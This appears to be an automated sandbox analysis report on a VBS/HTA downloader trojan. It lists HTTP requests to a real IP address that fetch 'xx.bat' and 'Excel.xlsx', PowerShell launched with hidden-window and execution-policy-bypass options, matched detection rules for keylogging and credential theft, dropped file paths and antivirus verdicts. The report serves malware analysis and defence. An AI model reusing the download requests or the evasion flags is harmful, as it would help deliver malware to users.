Data received | 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 |
Data received | FzEJGn+HNAZcvCpUCuJpUcIXDlx+qVWhxAZeH2h9UllPC3auzbcbyx73coh2cR7CEkfnaUNsHKdJjNVAoNsFJp8Cma68JZrhJ7GP+S+w7XeMetge5IrLpc5m2+R05WR/Eyy6nB/ig06QAyF45TSEkOxAShjaV7tqxfe0W27mdDfXgqYzyF7euo3upKIKI5zfyj3ENOqXcCAAQ1n3ZzVG3k6Eo2DO34jPeC1t9Kt39vmD9xPtHNNf2SD6nvq4S+BHRTjJFhn2Vr7miSQUWwifWQVDiydo2AH05x09UzNJQW+4qgZFPS9aQIX9dyc6suhq4VoHTx6R0NYnejlOAN5gd1Zqx4y9l1vJY9isNMEvE/qdD35cjF/ij1icSacl7Nymnh1gbQLPgc5urxbnrue/Q/A8ijU3lBS3GMFJ+FmUUx1e+fGY8p3O76Xu+aJrPEpEARt1gfUVmJp0raShTR7GvuYdm0lanMecbcru+E+qMNjZfDdrVY20qZaxZOrMylGV4EXaORygsoOnZ72UaDd9iZgFVyvdTcQC2lbGZ/M0KT/Ch8Pcog5WGDPp3hYLsz6CmzooVsN4q4lKKYD+NXSGC78lee5yr2xnhK+ZX3L6jF9+8Y61t9QzEFZRBe6wlUBFpFtGryUloTfYUNdGS7/VgqNwfk6jABf4r72McsAKz4UU2zwtmlwc1VeDNADDqrSZbFoO20dvbYWdlXyI31pWT9PP0tPhMHGf/XYuAfIfLyqLXhTB7PvfU/1OO7UdSVyKGzF1VlPl4f9SxTx2SL48kYOCC2punXDAergEOd/S2coXQ1T2cr1VotRnTC65FWMxclCaNx3ZULtpQvUDiRnp0Ssf6MqDs9IHQi9ZRfIoWoHQ+bkkkzTTmDBwNE4vj/JK53IP3JP/TvQC3V2diyr5ulNgQp04E8R+YGYXCsyBGHhuWOfqveG0xRN4pQF6gnFCkanCLMYJ6KDO1F8u/HAVvHpO1iihCLXmrqsbrXs8h7Bhveda9z3tWObtBtBK5mTiwejwzDMfZYYYKoMug9RzD8o5v2KRb2I7lp34WrYhRq3Eodl9sjzwmM1eyJfEahQ1c9naoMHhE8jZgnqtwWUOi1yWUnzJl+vH9ztXfVTTrnpFtHNil/p5UZF1Ad7kZTQMJNzePoHBiWQYzgoEBf6y7zvU03tCiJCB9T34hPl0YiF6mxsNzs/IZhxJBlC3k7y1QXrgpBLXGW5eDY/rUmfZAYBrQV3mhLRcj6Ub8iRiREHMzYr+YCLT/H+ZOJ4Rtb/CfC1GUT5xYYdfGivXFyu0eMlWbZRI3daE20NzAsh0N3XXeIwhW9squUCO2vNLjGsREGK2qW8Uf8b6bBwXKyvRHpm0eC/Hh1QCfAv72HTbL9MSVeYYwpOjidGEINk7fQLDpGoG43/P7iSE7+3p44MQfSnN22CGpeE6Gs9odjsA8s4xw3HbHreEATDL1m6ecOSAhrxLLnmpEX4g+qTFXNGAkfhXlLQ4djo1FlA77u0+HEEqocbin+uOCYC5ONA29+2wFQAZAQf8oBpNCc0SJucuuKIois7CfmM7atpbvWAI0zaL2fDnsqq4se9KFdygRhafAcKP9POGQRjAVEo1OhDNo3yryev9TDbBfsg8J8gjusxhc35Bp0QmkoSgBITGNc0JS1DMDMzU7UtvNqpobfQICK7rW6EItXGkfKqTFAOJ2LM2Ncwp5pyJDmiy6q/UtOizHzmvxplHHjhqJOl5+To1y6XZeaojH+0MCDnn0Cjvyl/KwFOVf025/yOr4mxX7zIhB8/L16sx8pYdD9g7w7pfXWucEhnwms6bbn4So8tV3XWl9MmjZyD5f+XEkr/ScuiX9z2Ryic0AwhAnf1ybiku4S4N5NDo8dXIoyZR2gDceY0XexzeKzlwvm8bnrOHIA18HuYp5dFE7Eb+o8pAcfjTG6l2XKm1X3DeGXI4wCwdWDim5G1kYT+rMCf7MtrpTzLDw8RqKUWJnh16SkC+CQN8G+QhyfBuK1oy3NJUjVo/c0zvR7biJQAO1mhb14wMvcsd |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data sent | GET /Excel.xlsx HTTP/1.1 Host: 193.222.96.143:7287 Connection: Keep-Alive |
Data sent | GET /xx.bat HTTP/1.1 Host: 193.222.96.143:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.143 |
file | C:\Users\test22\AppData\Roaming\Excel.xlsx |
file | C:\Users\test22\AppData\Roaming\xx.bat |
cve | CVE-2013-3906 |
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xx.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xx.bat | ||||||
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\Excel.xlsx |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Cynet | Malicious (score: 99) |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=81) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |